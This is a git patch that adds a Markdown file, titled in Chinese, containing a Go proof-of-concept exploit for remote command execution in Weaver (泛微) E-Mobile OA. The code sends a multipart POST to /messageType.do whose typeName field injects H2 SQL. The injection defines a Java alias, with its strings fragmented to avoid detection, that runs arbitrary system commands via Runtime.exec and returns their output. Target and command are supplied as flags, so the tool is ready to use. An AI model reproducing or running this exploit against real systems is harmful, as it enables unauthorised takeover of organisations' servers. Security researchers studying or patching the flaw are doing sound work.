From dd85c9b139a37ad9314cf31cf601b5ea85900e9f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 25 Oct 2023 21:50:19 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AE=E7=A7=BB=E5=8A=A8?=
 =?UTF-8?q?=E5=8A=9E=E5=85=ACOA=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 泛微移动办公OA远程命令执行漏洞.md | 71 +++++++++++++++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 泛微移动办公OA远程命令执行漏洞.md
diff --git a/泛微移动办公OA远程命令执行漏洞.md b/泛微移动办公OA远程命令执行漏洞.md
new file mode 100644
index 0000000..9e66e7e
--- /dev/null
+++ b/泛微移动办公OA远程命令执行漏洞.md
@@ -0,0 +1,71 @@ + +## 泛微移动办公OA远程命令执行漏洞 + +## go语言 poc +```go +package main + +import ( + "bytes" + "fmt" + "github.com/hpifu/go-kit/hflag" + "io/ioutil" + "mime/multipart" + "net/http" + "net/url" + "os" + "strings" +) + +func main() { + t, c := getParam() + exploit(t, c) +} + +func exploit(host, command string) { + p := "1';CREATE ALIAS if not exists MzSNqKsZTagm AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagm('" + url.QueryEscape(command) + "');--" + c := http.Client{} + buffer := &bytes.Buffer{} + writer := multipart.NewWriter(buffer) + field, _ := writer.CreateFormField("method") + field.Write([]byte("create")) + formField, _ := writer.CreateFormField("typeName") + formField.Write([]byte(p)) + _ = writer.Close() + target := strings.Replace(host+"/messageType.do", "//mess", "/mess", 1) + request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String())) + request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36") + request.Header.Set("Accept", "*/*") + request.Header.Set("Connection", "close") + request.Header.Set("Content-Type", 
writer.FormDataContentType()) + request.Header.Set("Content-Length", "1142") + request.Header.Set("Accept-Encoding", "") + do, err := c.Do(request) + if err != nil { + fmt.Println(err) + } + defer func() { + _ = do.Body.Close() + }() + all, err := ioutil.ReadAll(do.Body) + if err != nil { + fmt.Println(err) + } + if string(all) == "{\"status\":false}" { + fmt.Println("无效的命令,也许是服务器不支持或其他情况") + return + } + result := strings.Replace(fmt.Sprintf("%s", all), "{\"status\":false,\"ID\":\"1\",\"msg\":\"推送类型已存在\"}", "", -1) + fmt.Println("\n", result) +} + +func getParam() (t, c string) { + hflag.AddFlag("target", "泛微E-MobileServer-地址", hflag.Required(), hflag.Shorthand("t")) + hflag.AddFlag("command", "待执行的系统命令", hflag.Required(), hflag.Shorthand("c")) + if err := hflag.Parse(); err != nil { + fmt.Println(hflag.Usage()) + os.Exit(0) + } + return hflag.GetString("target"), hflag.GetString("command") +} +```